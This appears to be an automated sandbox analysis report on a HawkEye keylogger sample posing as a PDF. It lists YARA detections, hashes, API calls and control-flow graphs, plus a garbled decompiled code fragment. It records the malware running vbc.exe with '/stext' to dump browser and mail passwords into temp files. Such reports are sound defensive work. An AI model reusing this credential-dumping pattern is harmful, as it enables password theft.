                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:17:14:44
                                                            Start date:03/03/2021
                                                            Path:C:\Users\user\Desktop\5O857649056366403032021.PDF.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\5O857649056366403032021.PDF.exe
                                                            Imagebase:0xca0000
                                                            File size:1057280 bytes
                                                            MD5 hash:A67F05D542BCEE462ECC03AE4D8195D6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.784876138.0000000008720000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                            • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.778097540.00000000041A9000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.778097540.00000000041A9000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000002.00000002.785047145.0000000008890000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                            • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:17:15:05
                                                            Start date:03/03/2021
                                                            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                            Imagebase:0x400000
                                                            File size:1171592 bytes
                                                            MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            Reputation:high

                                                            General

                                                            Start time:17:15:05
                                                            Start date:03/03/2021
                                                            Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                            Imagebase:0x400000
                                                            File size:1171592 bytes
                                                            MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            Reputation:high

                                                            General

                                                            Start time:17:15:07
                                                            Start date:03/03/2021
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 516
                                                            Imagebase:0xed0000
                                                            File size:434592 bytes
                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:53
                                                              Total number of Limit Nodes:4

                                                              Graph

                                                              execution_graph 13518 2677740 13520 2677768 13518->13520 13519 2677790 13520->13519 13522 2676d6c 13520->13522 13523 2676d77 13522->13523 13527 267bc10 13523->13527 13533 267bbf8 13523->13533 13524 2677838 13524->13519 13529 267bc41 13527->13529 13530 267bc8e 13527->13530 13528 267bc4d 13528->13524 13529->13528 13539 267bf4a 13529->13539 13542 267bf58 13529->13542 13530->13524 13535 267bc8e 13533->13535 13536 267bc41 13533->13536 13534 267bc4d 13534->13524 13535->13524 13536->13534 13537 267bf4a 2 API calls 13536->13537 13538 267bf58 2 API calls 13536->13538 13537->13535 13538->13535 13545 267bf9a 13539->13545 13540 267bf62 13540->13530 13543 267bf62 13542->13543 13544 267bf9a 2 API calls 13542->13544 13543->13530 13544->13543 13546 267bfbb 13545->13546 13547 267bfd3 13546->13547 13553 267c230 13546->13553 13557 267c220 13546->13557 13547->13540 13548 267c1d0 GetModuleHandleW 13550 267c1fd 13548->13550 13549 267bfcb 13549->13547 13549->13548 13550->13540 13554 267c244 13553->13554 13556 267c269 13554->13556 13561 267b4b8 13554->13561 13556->13549 13558 267c244 13557->13558 13559 267c269 13558->13559 13560 267b4b8 LoadLibraryExW 13558->13560 13559->13549 13560->13559 13562 267c410 LoadLibraryExW 13561->13562 13564 267c489 13562->13564 13564->13556 13565 267e2a0 13566 267e2f9 SetWindowLongW 13565->13566 13567 267e30c 13566->13567 13568 2676f70 GetCurrentProcess 13569 2676fe3 13568->13569 13570 2676fea GetCurrentThread 13568->13570 13569->13570 13571 2677027 GetCurrentProcess 13570->13571 13572 2677020 13570->13572 13573 267705d 13571->13573 13572->13571 13574 2677085 GetCurrentThreadId 13573->13574 13575 26770b6 13574->13575 13576 267e058 13577 267e0c0 CreateWindowExW 13576->13577 13579 267e17c 13577->13579 13580 2677198 DuplicateHandle 13581 267722e 13580->13581

                                                              Executed Functions

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 132 267e330-267e3be call 267b544 139 267e3c0-267e409 call 267b464 call 267b4ac 132->139 140 267e40f-267e446 132->140 139->140 152 267e63b-267e65c 139->152 149 267e5c3-267e5ea 140->149 150 267e44c-267e475 140->150 162 267e5ef-267e611 149->162 161 267e47e-267e4e2 150->161 164 267e614-267e617 152->164 177 267e599-267e5a0 161->177 178 267e4e8-267e51d 161->178 162->164 167 267e61b-267e664 164->167 173 267e666 167->173 174 267e66e 167->174 173->174 177->167 179 267e5a2-267e5c1 177->179 178->177 185 267e51f-267e551 178->185 179->162 185->177 190 267e553-267e594 call 267e270 185->190 190->177
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90b9a992db056623d9bdc26102352e65703d7d80da745cf8f1717c00b223689e
                                                              • Instruction ID: 55557b89a8acf1a702cc84a965827295d3f6080b4b1f3f37049c2bcf7dc2c682
                                                              • Opcode Fuzzy Hash: 90b9a992db056623d9bdc26102352e65703d7d80da745cf8f1717c00b223689e
                                                              • Instruction Fuzzy Hash: DEB1F635E00319CFCB00DFA4D8549DDBBBAFF89304F258655E506AB3A5EB30A999CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 02676FD0
                                                              • GetCurrentThread.KERNEL32 ref: 0267700D
                                                              • GetCurrentProcess.KERNEL32 ref: 0267704A
                                                              • GetCurrentThreadId.KERNEL32 ref: 026770A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 48cd7f9f03317f9f5ee9f0ee46374d61a3e196c7c97501336f201e3ef2f0bb75
                                                              • Instruction ID: b76855f5c6b546ae42d571861f7ded64f4bc03df5242bdbc4166363cc09d26d0
                                                              • Opcode Fuzzy Hash: 48cd7f9f03317f9f5ee9f0ee46374d61a3e196c7c97501336f201e3ef2f0bb75
                                                              • Instruction Fuzzy Hash: FB5177B0A006498FCB15CFA9D688BDEBBF4BF49308F208459E518A3350DB345884CF25
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 02676FD0
                                                              • GetCurrentThread.KERNEL32 ref: 0267700D
                                                              • GetCurrentProcess.KERNEL32 ref: 0267704A
                                                              • GetCurrentThreadId.KERNEL32 ref: 026770A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: ab371632ba95dc29f30cdb381793bce4c83d829ab7df9f3d0f3de9ebc2aee93b
                                                              • Instruction ID: 7eb50cc4a25f3c771d56556d6d9206747a778fc501f73b0b8388f00df0c951db
                                                              • Opcode Fuzzy Hash: ab371632ba95dc29f30cdb381793bce4c83d829ab7df9f3d0f3de9ebc2aee93b
                                                              • Instruction Fuzzy Hash: 615154B0A006498FDB10CFAAD688BDEBBF5FF49318F208459E419A3350DB346884CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 194 267bf9a-267bfbd call 267b464 197 267bfd3-267bfd7 194->197 198 267bfbf 194->198 199 267bfeb-267c02c 197->199 200 267bfd9-267bfe3 197->200 248 267bfc5 call 267c220 198->248 249 267bfc5 call 267c230 198->249 205 267c02e-267c036 199->205 206 267c039-267c047 199->206 200->199 201 267bfcb-267bfcd 201->197 203 267c108-267c1c8 201->203 243 267c1d0-267c1fb GetModuleHandleW 203->243 244 267c1ca-267c1cd 203->244 205->206 208 267c06b-267c06d 206->208 209 267c049-267c04e 206->209 212 267c070-267c077 208->212 210 267c050-267c057 call 267b470 209->210 211 267c059 209->211 215 267c05b-267c069 210->215 211->215 216 267c084-267c08b 212->216 217 267c079-267c081 212->217 215->212 219 267c08d-267c095 216->219 220 267c098-267c0a1 call 267b480 216->220 217->216 219->220 224 267c0a3-267c0ab 220->224 225 267c0ae-267c0b3 220->225 224->225 227 267c0b5-267c0bc 225->227 228 267c0d1-267c0d5 225->228 227->228 229 267c0be-267c0ce call 2679d08 call 267b490 227->229 250 267c0d8 call 267c500 228->250 251 267c0d8 call 267c510 228->251 229->228 232 267c0db-267c0de 235 267c101-267c107 232->235 236 267c0e0-267c0fe 232->236 236->235 245 267c204-267c218 243->245 246 267c1fd-267c203 243->246 244->243 246->245 248->201 249->201 250->232 251->232
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0267C1EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 63b1630b7603bb37a19bc3dea0cf2318343b10a83b9e920253aec75b6f95ee6e
                                                              • Instruction ID: a036b39d1b47135621709f385be2c5048245735d7b8ada8504fd5a1ef68d9751
                                                              • Opcode Fuzzy Hash: 63b1630b7603bb37a19bc3dea0cf2318343b10a83b9e920253aec75b6f95ee6e
                                                              • Instruction Fuzzy Hash: 46811370A00B058FDB24DF6AE55475AB7F1BF88308F108A2ED44ADBB51DB35E846CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 252 267e052-267e0be 253 267e0c0-267e0c6 252->253 254 267e0c9-267e0d0 252->254 253->254 255 267e0d2-267e0d8 254->255 256 267e0db-267e113 254->256 255->256 257 267e11b-267e17a CreateWindowExW 256->257 258 267e183-267e1bb 257->258 259 267e17c-267e182 257->259 263 267e1bd-267e1c0 258->263 264 267e1c8 258->264 259->258 263->264 265 267e1c9 264->265 265->265
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0267E16A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: abbd9ab9f16e98aab3dcf69bad34f516f36dc817f5b8178b302482c45574af7b
                                                              • Instruction ID: 68a03e769cd743b95c6b40b5f10d29fe46102fc101b496a18c9a6ceb434aa910
                                                              • Opcode Fuzzy Hash: abbd9ab9f16e98aab3dcf69bad34f516f36dc817f5b8178b302482c45574af7b
                                                              • Instruction Fuzzy Hash: 3951C0B1D00319DFDB14CF9AD884ADEBBB5FF88314F24862AE819AB210D7759855CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 266 267e058-267e0be 267 267e0c0-267e0c6 266->267 268 267e0c9-267e0d0 266->268 267->268 269 267e0d2-267e0d8 268->269 270 267e0db-267e17a CreateWindowExW 268->270 269->270 272 267e183-267e1bb 270->272 273 267e17c-267e182 270->273 277 267e1bd-267e1c0 272->277 278 267e1c8 272->278 273->272 277->278 279 267e1c9 278->279 279->279
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0267E16A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 2540bf7f814a8d045a506d2994d20f9c906d37992799203a4edd3d52cff465a2
                                                              • Instruction ID: f6d09cfa77632f8228338b4d643ef392b7b1212648b72aa6cbccc1f54b634471
                                                              • Opcode Fuzzy Hash: 2540bf7f814a8d045a506d2994d20f9c906d37992799203a4edd3d52cff465a2
                                                              • Instruction Fuzzy Hash: C841B0B1D00319DFDB14CF9AD884ADEBBB5FF88314F24862AE819AB210D7759855CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 280 267e25f-267e277 281 267e27d-267e27f 280->281 282 267e279-267e27b 280->282 283 267e285-267e289 281->283 284 267e281-267e283 call 267b62c 281->284 282->281 284->283
                                                              APIs
                                                              • SetWindowLongW.USER32(?,?,?), ref: 0267E2FD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              • Opcode ID: adc065517c059896ea9a0dc5551d43291605b7c395655dece4590615605139d4
                                                              • Instruction ID: 71a337c17f845a7e8c3c52c87ac1a44ff578779285e09490ef6bffe92337a17b
                                                              • Opcode Fuzzy Hash: adc065517c059896ea9a0dc5551d43291605b7c395655dece4590615605139d4
                                                              • Instruction Fuzzy Hash: 8E21ADB1800248DFCB10CF94E884BDEBBF4FF49324F24848AD554A7251D3399909CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 287 2677191-267722c DuplicateHandle 288 2677235-2677252 287->288 289 267722e-2677234 287->289 289->288
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0267721F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 580d123a31b3044446224f468c4ba06e847fa45cdbeb66d2a35f4f669ed6442a
                                                              • Instruction ID: d3d442b4989f416f616fefe9c17c8ac09673be464c90327724c3fd459ea472a3
                                                              • Opcode Fuzzy Hash: 580d123a31b3044446224f468c4ba06e847fa45cdbeb66d2a35f4f669ed6442a
                                                              • Instruction Fuzzy Hash: D921F4B5D002199FDB00CFAAD984ADEFBF4FB48324F14841AE924A7350D374A945CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 292 2677198-267722c DuplicateHandle 293 2677235-2677252 292->293 294 267722e-2677234 292->294 294->293
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0267721F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 9c4b3311c7360bc4d674103b3d2a3f1fcd261e21fcd9161bdb0ea93a8a01643a
                                                              • Instruction ID: ac03cff65d0a0631cd10c02d90d916037f0d249197791d7c405fa186113cc8a5
                                                              • Opcode Fuzzy Hash: 9c4b3311c7360bc4d674103b3d2a3f1fcd261e21fcd9161bdb0ea93a8a01643a
                                                              • Instruction Fuzzy Hash: 2121C4B59002199FDB10CFAAD984ADEFBF8FB48324F14841AE914A3310D374A954CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 305 267c409-267c450 306 267c452-267c455 305->306 307 267c458-267c487 LoadLibraryExW 305->307 306->307 308 267c490-267c4ad 307->308 309 267c489-267c48f 307->309 309->308
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0267C269,00000800,00000000,00000000), ref: 0267C47A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 0c6b6493a220d54806c74fb3b935c6d30f76c98527f565e2df2c4968bceb2b13
                                                              • Instruction ID: 3c7b76392d86ee32cd557a6ec7d1b2f03a1c222ac8c54b5b054d91e391cee0d7
                                                              • Opcode Fuzzy Hash: 0c6b6493a220d54806c74fb3b935c6d30f76c98527f565e2df2c4968bceb2b13
                                                              • Instruction Fuzzy Hash: D22103B69002198FCB10CF9AD584AEEFBF4EB89324F14842AE419A7210C375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 297 267b4b8-267c450 299 267c452-267c455 297->299 300 267c458-267c487 LoadLibraryExW 297->300 299->300 301 267c490-267c4ad 300->301 302 267c489-267c48f 300->302 302->301
                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0267C269,00000800,00000000,00000000), ref: 0267C47A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: b2323a43c87a7089d0d9c4d7e1fd335a1d42660f2d564474661d8b924d271920
                                                              • Instruction ID: 1e5f2ec833c37ad4a10cd048eeae72240b8538b2b5b24baa411e628037f0d000
                                                              • Opcode Fuzzy Hash: b2323a43c87a7089d0d9c4d7e1fd335a1d42660f2d564474661d8b924d271920
                                                              • Instruction Fuzzy Hash: 1A1103B29002089FCB10CF9AD444BEEFBF4EB88324F14842AE919A7200C375A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 312 267c188-267c1c8 313 267c1d0-267c1fb GetModuleHandleW 312->313 314 267c1ca-267c1cd 312->314 315 267c204-267c218 313->315 316 267c1fd-267c203 313->316 314->313 316->315
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0267C1EE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 9ead2554a09212ef7f21f419adf85f6bbac9ab2d60b7bba98e90db3665a47dcb
                                                              • Instruction ID: cdf5d4064458911c499e8dc7054f1c6cba56dc2fbecf5642ae88f6c76b58df47
                                                              • Opcode Fuzzy Hash: 9ead2554a09212ef7f21f419adf85f6bbac9ab2d60b7bba98e90db3665a47dcb
                                                              • Instruction Fuzzy Hash: 0811DFB6D006498FCB10CF9AD844ADEFBF4EF88224F24846AD829A7600D375A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetWindowLongW.USER32(?,?,?), ref: 0267E2FD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              • Opcode ID: 776087cb9630acb5d4fdfb4c6cc12ee72e131fd24eb684baafdcd81df42854d2
                                                              • Instruction ID: f5e66455303add919e16e32cb62121b33f9d9491db528bc821f993d6dff35175
                                                              • Opcode Fuzzy Hash: 776087cb9630acb5d4fdfb4c6cc12ee72e131fd24eb684baafdcd81df42854d2
                                                              • Instruction Fuzzy Hash: F11112B59002088FDB10CF9AD584BDEBBF8FB48324F20845AE958A3300C379A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b59914b36235124fbf1c2b582458041f0d5e03058e9998c85e50eb8415327ca1
                                                              • Instruction ID: 6b31769aff0ec82e70ba19a3efe0eb9ca9a58c3c3053333516263ded1994899f
                                                              • Opcode Fuzzy Hash: b59914b36235124fbf1c2b582458041f0d5e03058e9998c85e50eb8415327ca1
                                                              • Instruction Fuzzy Hash: AB527AB1941746CFE712CF14E48819D3BB9FB40328FD06A09D5535B690DBB865EACF88
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.218439083.0000000002670000.00000040.00000001.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2670000_5O857649056366403032021.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43a7c1b26c8560f89dc5b8a2c90dbbd4f949211de428b60ec74329606118d62f
                                                              • Instruction ID: 37928ef7d7e8a501aaf08a8e6a0469c83d2210a6795e3589ab6bc06b6e17fa3d
                                                              • Opcode Fuzzy Hash: 43a7c1b26c8560f89dc5b8a2c90dbbd4f949211de428b60ec74329606118d62f
                                                              • Instruction Fuzzy Hash: B9A16D32E00619CFCF05DFB5D8845DEBBB2FF89308B15856AE815AB220EB31A955CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 46%
                                                              			E003448FF(void* __eax, signed int __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi) {
                                                              				intOrPtr* _t10;
                                                              				signed char _t11;
                                                              				intOrPtr* _t12;
                                                              				intOrPtr* _t13;
                                                              				intOrPtr* _t14;
                                                              				intOrPtr* _t15;
                                                              				intOrPtr* _t19;
                                                              				signed int* _t21;
                                                              				void* _t23;
                                                              				signed int* _t24;
                                                              				void* _t26;
                                                              
                                                              				_push(es);
                                                              				_t21 = __edx -  *__esi;
                                                              				_t10 = __eax -  *_t21;
                                                              				_push(ss);
                                                              				 *_t21 =  *_t21 + _t10;
                                                              				_t23 = __edi +  *((intOrPtr*)(_t26 + 0x34));
                                                              				 *_t10 =  *_t10 + _t10;
                                                              				_t11 = _t10 + 0x2a;
                                                              				 *__ebx =  *__ebx + _t21;
                                                              				 *_t21 =  *_t21 ^ _t11;
                                                              				 *((intOrPtr*)(_t26 + 0x9000000)) =  *((intOrPtr*)(_t26 + 0x9000000)) + _t21;
                                                              				 *_t11 =  *_t11 + _t11;
                                                              				asm("adc [ebx], ebp");
                                                              				_t12 = _t11 +  *__esi;
                                                              				_push(ss);
                                                              				 *_t12 =  *_t12 + _t12;
                                                              				_t13 = _t12 -  *((intOrPtr*)(_t23 + _t12 + 0x1f));
                                                              				_push(_t23);
                                                              				asm("popad");
                                                              				asm("invd");
                                                              				_pop(ds);
                                                              				_t24 = _t23 - 1;
                                                              				asm("popad");
                                                              				 *_t13 =  *_t13 + _t13;
                                                              				 *_t24 =  *_t24 | __ebx;
                                                              				_t14 = _t13 -  *((intOrPtr*)(_t13 + 0x1f));
                                                              				asm("adc cl, [ebx+ebp]");
                                                              				asm("in al, dx");
                                                              				asm("rcl byte [ebp], 1");
                                                              				 *__esi =  *__esi + _t14;
                                                              				_pop(ds);
                                                              				asm("adc ecx, [ebx+ebp]");
                                                              				asm("loope 0x9");
                                                              				_pop(ds);
                                                              				_push(__esi);
                                                              				_pop(_t19);
                                                              				_t15 = _t14;
                                                              				 *_t15 =  *_t15 + _t15;
                                                              				asm("sldt word [eax]");
                                                              				 *_t21 = _t21 +  *_t21;
                                                              				 *_t15 =  *_t15 + _t15;
                                                              				 *_t19 =  *_t19 + __ebx;
                                                              				 *_t15 =  *_t15 + _t15;
                                                              				 *((intOrPtr*)(_t15 + _t15)) =  *((intOrPtr*)(_t15 + _t15)) + _t19;
                                                              				 *_t24 =  *_t24 + __ebx;
                                                              				asm("adc [ebx+ebp], ecx");
                                                              				return _t15;
                                                              			}














                                                              0x003448ff
                                                              0x00344900
                                                              0x00344902
                                                              0x00344904
                                                              0x00344906
                                                              0x00344908
                                                              0x0034490b
                                                              0x0034490d
                                                              0x0034490f
                                                              0x00344911
                                                              0x00344913
